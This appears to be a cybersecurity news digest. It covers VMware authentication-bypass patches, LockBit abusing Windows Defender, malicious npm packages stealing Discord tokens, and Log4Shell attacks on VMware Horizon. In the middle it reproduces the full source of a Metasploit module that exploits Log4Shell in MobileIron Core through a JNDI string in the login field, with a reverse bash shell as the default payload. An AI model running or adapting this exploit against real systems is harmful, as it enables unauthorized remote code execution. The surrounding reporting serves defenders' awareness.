VMWare Urges Users to Patch Critical Authentication Bypass Bug

 

Description

VMware and experts alike are urging users to patch multiple products affected by a critical authentication bypass vulnerability that can allow an attacker to gain administrative access to a system as well as exploit other flaws.

The bug—tracked as CVE-2022-31656—earned a rating of 9.8 on the CVSS and is one of a number of fixes the company made in various products in an update released on Tuesday for flaws that could easily become an exploit chain, researchers said.

CVE-2022-31656 also certainly the most dangerous of these vulnerabilities, and likely will become more so as the researcher who discovered it–Petrus Viet of VNG Security–has promised in a tweet that a proof-of-concept exploit for the bug is “soon to follow,” experts said.

This adds urgency to the need for organizations affected by the flaw to patch now, researchers said.

“Given the prevalence of attacks targeting VMware vulnerabilities and a forthcoming proof-of-concept, organizations need to make patching CVE-2022-31656 a priority,” Claire Tills, senior research engineer with Tenable’s Security Response Team, said in an email to Threatpost. “As an authentication bypass, exploitation of this flaw opens up the possibility that attackers could create very troubling exploit chains.”

Potential for Attack Chain

Specifically, CVE-2022-31656 is an authentication bypass vulnerability affecting VMware Workspace ONE Access, Identity Manager and vRealize Automation.

The bug affects local domain users and requires that a remote attacker must have network access to a vulnerable user interface, according to a blog post by Tills published Tuesday. Once an attacker achieves this, he or she can use the flaw to bypass authentication and gain administrative access, she said.

Moreover, the vulnerability is the gateway to exploiting other remote code execution (RCE) flaws addressed by VMWare’s release this week—CVE-2022-31658 and CVE-2022-31659—to form an attack chain, Tills observed.

CVE-2022-31658 is a JDBC injection RCE vulnerability that affect VMware Workspace ONE Access, Identity Manager and vRealize Automation that’s earned an “important” score on the CVSS—8.0. The flaw allows a malicious actor with administrator and network access to trigger RCE.

CVE-2022-31659 is an SQL injection RCE vulnerability that affects VMware Workspace ONE Access and Identity Manager and also earned a rating of 8.0 with a similar attack vector to CVE-2022-31658. Viet is credited with discovering both of these flaws.

The other six bugs patched in the update include another RCE bug (CVE-2022-31665) rated as important; two privilege escalation vulnerabilities (CVE-2022-31660 and CVE-2022-31661) rated as important; a local privilege escalation vulnerability (CVE-2022-31664) rated as important; a URL Injection Vulnerability (CVE-2022-31657) rated as moderate; and a path traversal vulnerability (CVE-2022-31662) rated as moderate.

Patch Early, Patch Everything

VMware is no stranger to having to rush out patches for critical bugs found in its products, and has suffered its share of security woes due to the ubiquity of its platform across enterprise networks.

In late June, for example, federal agencies warned of attackers pummeling VMware Horizon and Unified Access Gateway (UAG) servers to exploit the now-infamous Log4Shell RCE vulnerability, an easy-to-exploit flaw discovered in the Apache logging library Log4J late last year and continuously targeted on VMware and other platforms since then.

Indeed, sometimes even patching has still not been enough for VMware, with attackers targeting existing flaws after the company does its due diligence to release a fix.

This scenario occurred in December 2020, when the feds warned the adversaries were actively exploiting a weeks-old bug in Workspace One Access and Identity Manager products three days after the vendor patched the vulnerability.

Though all signs point to the urgency of patching the latest threat to VMware’s platform, it’s highly likely that even if the advice is heeded, the danger will persist for the foreseeable future, observed one security professional.

Though enterprises tend to initially move quickly to patch the most imminent threats to their network, they often miss other places attackers can exploit a flaw, observed Greg Fitzgerald, co-founder of Sevco Security, in an email to Threatpost. This is what leads to persistent and ongoing attacks, he said.

“The most significant risk for enterprises isn’t the speed at which they are applying critical patches; it comes from not applying the patches on every asset,” Fitzgerald said. “The simple fact is that most organizations fail to maintain an up-to-date and accurate IT asset inventory, and the most fastidious approach to patch management cannot ensure that all enterprise assets are accounted for.”

Read More

MobileIron Log4Shell Remote Command Execution

`##  

# This module requires Metasploit: https://metasploit.com/download  

# Current source: https://github.com/rapid7/metasploit-framework  

##  

class MetasploitModule < Msf::Exploit::Remote  

Rank = ExcellentRanking  

  

include Msf::Exploit::Remote::Log4Shell  

include Msf::Exploit::Remote::HttpClient  

prepend Msf::Exploit::Remote::AutoCheck  

  

def initialize(_info = {})  

super(  

'Name' => 'MobileIron Core Unauthenticated JNDI Injection RCE (via Log4Shell)',  

'Description' => %q{  

MobileIron Core is affected by the Log4Shell vulnerability whereby a JNDI string sent to the server  

will cause it to connect to the attacker and deserialize a malicious Java object. This results in OS  

command execution in the context of the tomcat user.  

  

This module will start an LDAP server that the target will need to connect to.  

},  

'Author' => [  

'Spencer McIntyre', # JNDI/LDAP lib stuff  

'RageLtMan <rageltman[at]sempervictus>', # JNDI/LDAP lib stuff  

'rwincey', # discovered log4shell vector in MobileIron  

'jbaines-r7' # wrote this module  

],  

'References' => [  

[ 'CVE', '2021-44228' ],  

[ 'URL', 'https://attackerkb.com/topics/in9sPR2Bzt/cve-2021-44228-log4shell/rapid7-analysis'],  

[ 'URL', 'https://forums.ivanti.com/s/article/Security-Bulletin-CVE-2021-44228-Remote-code-injection-in-Log4j?language=en_US' ],  

[ 'URL', 'https://www.mandiant.com/resources/mobileiron-log4shell-exploitation' ]  

],  

'DisclosureDate' => '2021-12-12',  

'License' => MSF_LICENSE,  

'DefaultOptions' => {  

'RPORT' => 443,  

'SSL' => true,  

'SRVPORT' => 389,  

'WfsDelay' => 30  

},  

'Targets' => [  

[  

'Linux', {  

'Platform' => 'unix',  

'Arch' => [ARCH_CMD],  

'DefaultOptions' => {  

'PAYLOAD' => 'cmd/unix/reverse_bash'  

}  

},  

]  

],  

'Notes' => {  

'Stability' => [CRASH_SAFE],  

'SideEffects' => [IOC_IN_LOGS],  

'AKA' => ['Log4Shell', 'LogJam'],  

'Reliability' => [REPEATABLE_SESSION],  

'RelatedModules' => [  

'auxiliary/scanner/http/log4shell_scanner',  

'exploit/multi/http/log4shell_header_injection'  

]  

}  

)  

register_options([  

OptString.new('TARGETURI', [ true, 'Base path', '/'])  

])  

end  

  

def wait_until(&block)  

datastore['WfsDelay'].times do  

break if block.call  

  

sleep(1)  

end  

end  

  

def check  

validate_configuration!  

  

vprint_status('Attempting to trigger the jndi callback...')  

  

start_service  

res = trigger  

return Exploit::CheckCode::Unknown('No HTTP response was received.') if res.nil?  

  

wait_until { @search_received }  

@search_received ? Exploit::CheckCode::Vulnerable : Exploit::CheckCode::Unknown('No LDAP search query was received.')  

ensure  

cleanup_service  

end  

  

def build_ldap_search_response_payload  

return [] if @search_received  

  

@search_received = true  

  

return [] unless @exploiting  

  

print_good('Delivering the serialized Java object to execute the payload...')  

build_ldap_search_response_payload_inline('CommonsBeanutils1')  

end  

  

def trigger  

@search_received = false  

  

send_request_cgi(  

'method' => 'POST',  

'uri' => normalize_uri(target_uri, 'mifs', 'j_spring_security_check'),  

'headers' => {  

'Referer' => "https://#{rhost}#{normalize_uri(target_uri, 'mifs', 'user', 'login.jsp')}"  

},  

'encode' => false,  

'vars_post' => {  

'j_username' => log4j_jndi_string,  

'j_password' => Rex::Text.rand_text_alphanumeric(8),  

'logincontext' => 'employee'  

}  

)  

end  

  

def exploit  

validate_configuration!  

@exploiting = true  

start_service  

res = trigger  

fail_with(Failure::Unreachable, 'Failed to trigger the vulnerability') if res.nil?  

fail_with(Failure::UnexpectedReply, 'The server replied to the trigger in an unexpected way') unless res.code == 302  

  

wait_until { @search_received && (!handler_enabled? || session_created?) }  

handler  

end  

end  

`

Read More

LockBit Ransomware Abuses Windows Defender to Deploy Cobalt Strike Payload

 

Description

A threat actor associated with the LockBit 3.0 ransomware-as-a-service (RaaS) operation has been observed abusing the Windows Defender command-line tool to decrypt and load Cobalt Strike payloads.

According to a report published by SentinelOne last week, the incident occurred after obtaining initial access via the Log4Shell vulnerability against an unpatched VMware Horizon Server.

“Once initial access had been achieved, the threat actors performed a series of enumeration commands and attempted to run multiple post-exploitation tools, including Meterpreter, PowerShell Empire, and a new way to side-load Cobalt Strike,” researchers Julio Dantas, James Haughom, and Julien Reisdorffer said.

LockBit 3.0 (aka LockBit Black), which comes with the tagline “Make Ransomware Great Again!,” is the next iteration of the prolific LockBit RaaS family that emerged in June 2022 to iron out critical weaknesses discovered in its predecessor.

It’s notable for instituting what’s the first-ever bug bounty for a RaaS program. Besides featuring a revamped leak site to name-and-shame non-compliant targets and publish extracted data, it also includes a new search tool to make it easier to find specific victim data.

The use of living-off-the-land (LotL) techniques by cyber intruders, wherein legitimate software and functions available in the system are used for post-exploitation, is not new and is usually seen as an attempt to evade detection by security software.

Earlier this April, a LockBit affiliate was found to have leveraged a VMware command-line utility called VMwareXferlogs.exe to drop Cobalt Strike. What’s different this time around is the use of MpCmdRun.exe to achieve the same goal.

MpCmdRun.exe is a command-line tool for carrying out various functions in Microsoft Defender Antivirus, including scanning for malicious software, collecting diagnostic data, and restoring the service to a previous version, among others.

In the incident analyzed by SentinelOne, the initial access was followed by downloading a Cobalt Strike payload from a remote server, which was subsequently decrypted and loaded using the Windows Defender utility.

“Tools that should receive careful scrutiny are any that either the organization or the organization’s security software have made exceptions for,” the researchers said.

“Products like VMware and Windows Defender have a high prevalence in the enterprise and a high utility to threat actors if they are allowed to operate outside of the installed security controls.”

The findings come as initial access brokers (IABs) are actively selling access to company networks, including managed service providers (MSPs), to fellow threat actors for profit, in turn offering a way to compromise downstream customers.

In May 2022, cybersecurity authorities from Australia, Canada, New Zealand, the U.K., and the U.S. warned of attacks weaponizing vulnerable managed service providers (MSPs) as an “initial access vector to multiple victim networks, with globally cascading effects.”

“MSPs remain an attractive supply chain target for attackers, particularly IABs,” Huntress researcher Harlan Carvey said, urging companies to secure their networks and implement multi-factor authentication (MFA).

Read More

Malicious Npm Packages Tapped Again to Target Discord Users

 

Description

Threat actors once again are using the node package manager (npm) repository to hide malware that can steal Discord tokens to monitor user sessions and steal data on the popular chat and collaboration platform, researchers have found.

A campaign discovered this week by Kaspersky researchers is hiding an open-source token logger alongside a novel JavaScript malware in npm packages. The campaign, dubbed LofyLife, is aimed at stealing Discord tokens as well as victims’ IP addresses from infected machines, they said in a blog post on Secure List published Thursday.

Researchers were monitoring open-source repositories on Tuesday when they noticed suspicious activity in the form of four packages containing “highly obfuscated malicious Python and JavaScript code” in the npm repository, they wrote in the post.

The Python code turned out to be a modified version of the open-source token logger Volt Stealer, while the novel JavaScript malware–dubbed “LofyStealer”–was created to infect Discord client files so threat actors can monitor the victim’s actions, researchers said.

“It detects when a user logs in, changes email or password, enables/disables multi-factor authentication (MFA) and adds new payment methods, including complete bank card details,” researchers Igor Kuznetsov and Leonid Bezvershenko wrote. “Collected information is also uploaded to the remote endpoint whose address is hard-coded.”

Npm As Supply-Chain Threat

The npm repository is an open-source home for JavaScript developers to share and reuse code blocks that then can be reused to build various web applications. The repository poses a significant supply-chain given that if it’s corrupted, the malicious code is then propagated in any app using it and thus can be used to attack those app’s myriad users.

Indeed, attacking open-source repositories can be an unusually stealthy way for threat actors to target scores of apps and users in one fell swoop. This was made abundantly clear with the now infamous Log4Shell debacle, when a zero-day flaw in the ubiquitous Java logging library Apache Log4j used by countless web apps threatened to break the internet.

“Many people assumed that software created by a vendor was entirely authored by that vendor, but in reality there could be hundreds of third-party libraries making up even the simplest software,” observed Tim Mackey, principal security strategist at the Synopsys Cybersecurity Research Center, in an email to Threatpost.

This broad attack surface has not gone unnoticed by threat actors, who increasingly are targeting open-source repositories to hide malware that can lurk unsuspected across multiple platforms.

“Any attack vector that can reach a significant number of targets, or a number of significant targets is of interest to threat actors,” Casey Bisson, head of product and developer enablement at code-security firm BluBracket, wrote in an email to Threatpost.

Discord in the Crosshairs

Npm has become an especially attractive target for threat actors as it not only has tens of millions of users, but packages hosted by the repository also have been downloaded billions of times, he said.

“It’s used both by experienced Node.js developers and those using it casually as part of other activities,” Bisson observed. “Npm modules are used both in Node.js production applications, and in developer tooling for applications that wouldn’t otherwise use Node. That ubiquitous use among developers makes it a big target.”

Indeed, LofyLife is not the first time threat actors have used npm to target Discord users. In December, researchers at JFrog identified a set of 17 malicious npm packages with varying payloads and tactics that targeted the virtual meeting platform, which is used by 350 million users and enables communication via voice calls, video calls, text messaging and files.

Prior to that in January 2021, other researchers discovered three malicious npm packages from the threat actors behind the CursedGrabber malware aimed at stealing Discord tokens and other data from users of the platform.

Kaspersky, among other security firms, is constantly monitoring updates to npm repositories to ensure that all new malicious packages are detected and removed, researchers said.

Read More

CISA Releases Log4Shell-Related MAR

 

Description

From May through June 2022, CISA responded to an organization that was compromised by an exploitation of an unpatched and unmitigated Log4Shell vulnerability in a VMware Horizon server. CISA analyzed five malware samples obtained from the organization’s network and released a Malware Analysis Report of the findings.

Users and administrators are encouraged to review MAR 10386789-1.v1 for more information. For more information on Log4Shell, see:

• Joint Cybersecurity Advisory (CSA) Malicious Cyber Actors Continue to Exploit Log4Shell in VMware Horizon Systems,
• CISA’s Apache Log4j Vulnerability Guidance webpage,
• Joint CSA Mitigating Log4Shell and Other Log4j-Related Vulnerabilities, and
• CISA’s database of known vulnerable services on the CISA GitHub page.

This product is provided subject to this Notification and this Privacy & Use policy.

Read More

Patchable and Preventable Security Issues Lead Causes of Q1 Attacks

 

Description

Eighty-two percent of attacks on organizations in Q1 2022 were caused by the external exposure of a known vulnerabilities in the victim’s external-facing perimeter or attack surface. Those unpatched bugs overshadowed breach-related financial losses tied to human error, which accounted for 18 percent.

The numbers come from Tetra Defense and its quarterly report that sheds light on a notable uptick in cyberattacks against United States organizations between January and March 2022.

The report did not let employee security hygiene, or a lack thereof, off the hook. Tetra revealed that a lack of multi-factor authentication (MFA) mechanisms adopted by firms and compromised credential are still major factors in attacks against organizations.

External Exposures: A Major Path of Compromise

The study looks at the Root Point of Compromise (RPOC) in attacks. The RPOC is the initial entry point through which a threat actor infiltrates a victim organization and is categorized as the external exposure to a known vulnerability, or a malicious action performed by the user or a system misconfiguration.

“Incidents caused by unpatched systems cost organizations 54 percent more than those caused by employee error,” according to the report.

Researcher draw a line of distinction between “External Vulnerabilities” and “Risky External Exposures”.

External Vulnerabilities, defined by Tetra Defense, refers incidents where an attacker leverages the publicly available exploit to attack the victim’s network. Risky External Exposure, on the other hand, include IT practices such as leaving an internet-facing port open that can be used by an adversary to target the system.

“These behaviors are considered ‘risky’ because the mitigation relies on an organization’s continued security vigilance and willingness to enforce consistent standards over long periods of time,” said Tetra Defense in the report.

Risky External Exposure, the study found, account for 57 percent of an organizations’ losses.

Learning Lessons the Hard Way

According to Tetra Defense, the widespread awareness about the Log4Shell vulnerability minimize the active exploitation and was only the third most exploited external exposure accounting for 22 percent of total incident response cases. The Microsoft Exchange vulnerability ProxyShell outpaces the Log4Shell and leads the way by accounting for 33 percent of cases.

The Tetra Defense revealed that nearly 18 percent of the events were caused by the unintentional action performed by an individual employee in the organization.

“Over half (54 percent) of the incidents where ‘User Action’ was the RPOC were caused by an employee opening a malicious document,” Tetra Defense noted. The researcher analyzed that most incidents include malicious email campaigns targeting individuals and organizations at random.

The other major incident is the abuse of compromised credentials which contributes to 23 percent of incidents involved in user action. The reports indicate that usage of the same password across multiple sites is one of the main factors leading to credential leaking and account takeover.

“If one of the sites experiences a breach and the credentials are leaked to the dark web, those credentials can be used to compromise other systems where the same pair of username and password is used,” said Tetra Defense.

In the recent findings by Tetra Defense, the healthcare industry leads with approximately 20 percent of the total incidents reported in the first quarter of 2022. Apart from healthcare Tetra Defense collected insights from twelve different verticals including finance, education, manufacturing and construction.

The Patching Imperative

According to the reports by Tetra Defense, the median cost for an incident response engagement where external vulnerability was the RPOC is 54 percent more than the events where “User Action” was the RPOC.

“Advocating for better patching practices has almost become a cliché at this point as it’s common knowledge that it plays a major role in reducing cyber risk,” Tetra Defense noted.

“To best prevent exploitation of external vulnerabilities, organizations need to understand their attack surface and prioritize patching based on risk, all while ensuring they have the defenses in place to protect their systems knowing that that will have obstacles that will prevent them from immediately patching vulnerable systems,” Tetra Defense added.

The researcher observed multiple cybercriminal groups active on the dark web. “With such a large number of groups being actively observed it highlights the constant challenges organization have in protecting themselves, because if even one group becomes inactive or is taken down by law enforcement, there remain dozens of other groups actively trying to compromise them,” Tetra Defense concluded.

Read More

Log4Shell Vulnerability Targeted in VMware Servers to Exfiltrate Data

 

Description

The Cybersecurity and Infrastructure Security Agency (CISA) and Coast Guard Cyber Command (CGCYBER) released a joint advisory warning the Log4Shell flaw is being abused by threat actors that are compromising public-facing VMware Horizon and Unified Access Gateway (UAG) servers.

The VMware Horizon is a platform used by administrators to run and deliver virtual desktops and apps in the hybrid cloud, while UAG provides secure access to the resources residing inside a network.

According to the CISA, in one instance the advance persistent threat (APT) actor compromises the victim’s internal network, procures a disaster recovery network, and extracts sensitive information. “As part of this exploitation, suspected APT actors implanted loader malware on compromised systems with embedded executables enabling remote command and control (C2),” CISA added.

Attack Analysis

The CGCYBER conducts a proactive threat hunting engagement at an organization that was compromised by the threat actors who exploited Log4Shell in VMware Horizon. This revealed that after gaining initial access to the victim system, the adversary uploaded a malware identified as “hmsvc.exe”.

The researchers analyzed the sample of the hmsvc.exe malware and confirmed that the process masquerading as a legitimate Windows service and an altered version of SysInternals LogonSessions software.

According to the researcher sample of hmsvc.exe malware was running with the highest privilege level on a Windows system and contains an embedded executable that allows threat actors to log keystrokes, upload and execute payloads.

“The malware can function as a C2 tunneling proxy, allowing a remote operator to pivot to other systems and move further into a network,” The initial execution of malware created a scheduled task that is set to execute every hour.

According to CISA in another onsite incident response engagement, they observed bi-directional traffic between the victim and the suspected APT IP address.

The attackers initially gain access to the victim’s production environment (a set of computers where the user-ready software or update are deployed), by exploiting Log4Shell in unpatched VMware Horizon servers. Later CISA observed that the adversary uses Powershell scripts to perform lateral movements, retrieve and execute the loader malware with the capability to remotely monitor a system, gain reverse shell and exfiltrate sensitive information.

Further analysis revealed that attackers with access to the organization test and production environment leveraged CVE-2022-22954, an RCE flaw in VMware workspace ONE access and Identity manager. to implant the Dingo J-spy web shell,

Incident Response and Mitigations

CISA and CGCYBER recommended multiple actions that should be taken if an administrator discovers compromised systems:

1. Isolate compromised system
2. Analyze the relevant log, data and artifacts.
3. All software should be updated and patched from the .
4. Reduce the non-essential public-facing hosting service to restrict the attack surface and implement DMZ, strict network access control, and WAF to protect against attack.
5. Organizations are advised to implement best practices for identity and access management (IAM) by introducing multifactor authentication (MFA), enforcing strong passwords, and limited user access.

Read More